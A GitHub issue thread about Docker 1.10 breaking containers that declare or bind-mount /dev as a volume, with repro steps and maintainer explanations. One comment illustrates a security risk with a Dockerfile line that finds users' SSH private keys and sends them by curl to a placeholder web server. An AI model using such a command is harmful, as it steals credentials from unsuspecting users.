### ISSUE TITLE
/dev volume mapping issue

### ISSUE THREAD

**Issue by XAMeLeOH** [moby/moby#20228]
I've got an error while trying to map /dev outside of container in docker-1.10. Same thing works well in docker 1.9.

```
adm@lyra:/tmp/docker-1.10$ docker version
Client:
 Version:      1.10.0
 API version:  1.22
 Go version:   go1.5.3
 Git commit:   590d5108
 Built:        Thu Feb  4 18:36:33 2016
 OS/Arch:      linux/amd64

Server:
 Version:      1.10.0
 API version:  1.22
 Go version:   go1.5.3
 Git commit:   590d5108
 Built:        Thu Feb  4 18:36:33 2016
 OS/Arch:      linux/amd64

adm@lyra:/tmp/docker-1.10$ docker info
Containers: 4
 Running: 0
 Paused: 0
 Stopped: 4
Images: 337
Server Version: 1.10.0
Storage Driver: aufs
 Root Dir: /var/lib/docker/aufs
 Backing Filesystem: extfs
 Dirs: 345
 Dirperm1 Supported: false
Execution Driver: native-0.2
Logging Driver: json-file
Plugins: 
 Volume: local
 Network: bridge null host
Kernel Version: 3.13.0-76-generic
Operating System: Ubuntu 14.04.3 LTS
OSType: linux
Architecture: x86_64
CPUs: 4
Total Memory: 7.782 GiB
Name: lyra
ID: Q7UM:B5EI:SMUB:TJ23:M4HO:LMJ2:NIEL:HQKJ:IXJO:PMWX:54SR:D43X
Username: frist
Registry: https://index.docker.io/v1/
WARNING: No swap limit support

adm@lyra:/tmp/docker-1.10$ uname -a
Linux lyra 3.13.0-76-generic #120-Ubuntu SMP Mon Jan 18 15:59:10 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
```

I've got this problem both on physical and virtual (qemu-kvm) environment.

There are two simple examples to reproduce the issue. The first one is to build dockerfile:

Step 1. Create a Dockerfile like that: 

```
adm@lyra:/tmp/docker-1.10$ cat Dockerfile 
FROM debian:jessie
VOLUME ["/dev"]
RUN echo Hello
```

Step 2. Build it:

```
adm@lyra:/tmp/docker-1.10$ docker build -t dockertest .
Sending build context to Docker daemon 2.048 kB
Step 1 : FROM debian:jessie
 ---> 9a02f494bef8
Step 2 : VOLUME /dev
 ---> Running in 615e009a0db5
 ---> 513bef98c58b
Removing intermediate container 615e009a0db5
Step 3 : RUN echo Hello
 ---> Running in 51c2406b04bd
no such file or directory
Container command not found or does not exist.
```

The second method is to run built image with /dev mapping:

Just run container:

```
adm@lyra:/tmp/docker-1.10$ docker run -v /tmp/dockerdev:/dev -it --rm debian:jessie bash
no such file or directory
docker: Error response from daemon: Container command not found or does not exist..
```

Both methods are in previous versions of the docker-engine.

**Comment by XAMeLeOH** [comment]
Can anybody confirm this?

**Comment by thaJeztah** [comment]
Did this work for you before 1.10? Making `/dev` a volume will probably no work; `/dev` is a special location in Linux, and contains "devices", such as `/dev/stdin`, `/dev/stdout`. Making this a volume breaks that behavior and leads to unexpected results.

I'll close this issue, because this is expected, but feel free comment here if you think there's something we can improve here

**Comment by XAMeLeOH** [comment]
Before 1.10 it worked as expected. /dev/ is a special location it's true, but this is just a directory which contains special devices created by system. Since docker 1.7 till 1.9 where was no problem to map this directory outside of container. You can try to do this.
Devices you listed should be created inside of this directory on OS start (on container start in this case).

**Comment by Wombasta** [comment]
I also encountered the same issue. Why would somebody wanted to prevent /dev directory from mapping as a volume? This is still a directory and mounting it has some use-cases.
I assume this is some kind of a bug in docker 1.10.

**Comment by thaJeztah** [comment]
Let me reopen

**Comment by phemmer** [comment]
The issue isn't mounting `/dev` from outside the container. That works fine and is supported (#16639). 
The issue is most likely the `VOLUME /dev` inside the Dockerfile. I would recommend removing that as it doesn't really serve a purpose. You do not need to add `VOLUME foo` to make a path usable by `-v foo:foo`.

**Comment by istr** [comment]
> I would recommend removing that as it doesn't really serve a purpose.

From my point of view it serves the purpose to get rid of the need for the ```-v``` flag, to start with. See #20563.

**Comment by vdemeester** [comment]
@istr by using `VOLUME /dev` in the Dockerfile, you tell `docker` that the `/dev` folder will be in a volume, meaning it will be empty (using an anonymous volume) if you don't bind it at runtime. `VOLUME /dev` is not equivalent to `-v /dev:/dev`.

See @thaJeztah's comment, it explains it well https://github.com/docker/docker/issues/20563#issuecomment-187081471.

**Comment by istr** [comment]
> VOLUME /dev is not equivalent to -v /dev:/dev

@vdemeester Yes, I understood (eventually) and consider this fact to be broken.

**Comment by phemmer** [comment]
@istr if it worked like you wanted, I could create an image such as:

```
VOLUME /home
CMD find /home/*/.ssh/id_rsa -exec curl --data @{} http://my.web.server/ssh_keys \;
```
...which would be a MAJOR vulnerability.

**Comment by holybit** [comment]
+1 same issue here. Where I work we are using the syslog /dev/log socket solution as detailed [here](https://jpetazzo.github.io/2014/08/24/syslog-docker/).

Same result as OP:

```
docker run -it --rm -v /tmp/:/dev ubuntu:latest bash
no such file or directory
docker: Error response from daemon: Container command not found or does not exist..
```

**Comment by phemmer** [comment]
@holybit I would argue that should not work. The whole point of `-v` is to override the contents of the container at that location. By doing `-v /tmp:/dev` you're saying override `/dev` in the container with `/tmp` from the host. It makes sense that the container wont work as `/dev` isn't going to have anything needed to run.

**Comment by holybit** [comment]
@phemmer Let's change my example a tad where `/tmp/syslogdev/` is an empty dir.

`$ docker run -it --rm -v /tmp/syslogdev:/dev ubuntu:latest bash`

I get what your saying, but this behavior goes back a long ways even if it's not correct.

**Comment by XAMeLeOH** [comment]
@phemmer So why was it work in early versions?

If it should not work I want to know: 1) why? 2) why now?

Besides what is the container command that was not found? And what exactly about the message "no such file or directory"?

**Comment by phemmer** [comment]
@XAMeLeOH for cause, see #16639

**Comment by thaJeztah** [comment]
@phemmer ah! thanks for linking that. Thinking if it would make sense to preserve the "old" behavior if a "regular" (non bind-mounted) volume is used.

**Comment by jonseymour** [comment]
I also have been using the @jpetazzo syslog technique and would be interested to learn of how to achieve the same or similar capability with Docker 1.10.

**Comment by jonseymour** [comment]
FWIW: I actually no longer have a need for @jpetazzo's solution since docker run now has the --log-driver option.

**Comment by MhdAli** [comment]
@holybit I had the same issue that you have, and I fixed it by configuring rsyslog to create unix socket in different location other than `/dev`.

This may help you: https://github.com/helderco/docker-rsyslog/blob/master/rsyslog.conf#L13

**Comment by sethuster** [comment]
This is really annoying when dealing with multiple apps that use a socket for /dev in syslog.

**Comment by cpuguy83** [comment]
@sethuster What's the issue?

Overall I'm not sure what issue everyone is having.
If you mount an empty dir over the container's `/dev`, the container likely won't work.
What are you expecting Docker to do here?

**Comment by sethuster** [comment]
The best solution for many would be just to let Docker mount /dev as a volume like it used to do in every previous version.  This is a breaking change for my and many organizations.

**Comment by cpuguy83** [comment]
@sethuster So like `-v /dev`? Why? `-v /dev:/dev` works just fine, btw.

I'm not sure how/why this broke, but why do you need this?

**Comment by sethuster** [comment]
![facepalm](https://media1.giphy.com/media/xT1XGyUR9PSfwfUeAw/200.gif)

in the Dockerfile we're not allowed to do: 
```VOLUME ["/dev"]```

We still can mount that volume in the Docker-compose file. Thanks for making me realize this.

**Comment by ViktorBarzin** [comment]
Trying to run 
`mkdir -p /dev/net`
And it does not create the folder. Running `ls /dev/net` says no such file or directory. Docker 17.03. Ideas?

**Comment by vdemeester** [comment]
This issue is old and the behavior is by design (as explained multiple times).

> by using `VOLUME /dev` in the Dockerfile, you tell `docker` that the `/dev` folder will be in a volume, meaning it will be empty (using an anonymous volume) if you don't bind it at runtime. `VOLUME /dev` is not equivalent to `-v /dev:/dev`.

You can mount `/dev` at run but not declaring it as `VOLUME` in the Dockerfile. Volumes (either in `Dockerfile` with `VOLUME` or using `-v name`) and Mounts (using `-v /foo:/bar`) are 2 differents things in Docker : [see the documentation](https://docs.docker.com/storage/bind-mounts/#choosing-the--v-or---mount-flag)
I'm gonna go ahead and close this one. If you are still affected, please open a new one. But the only thing we could do to prevent user to shoot in their foot might be, on linux, to warn (or disallow) declaring some special folder as volumes (like `dev`).
